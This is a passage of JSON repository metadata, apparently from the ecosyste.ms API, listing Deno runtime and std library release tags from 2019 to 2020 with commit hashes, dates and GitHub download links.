Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.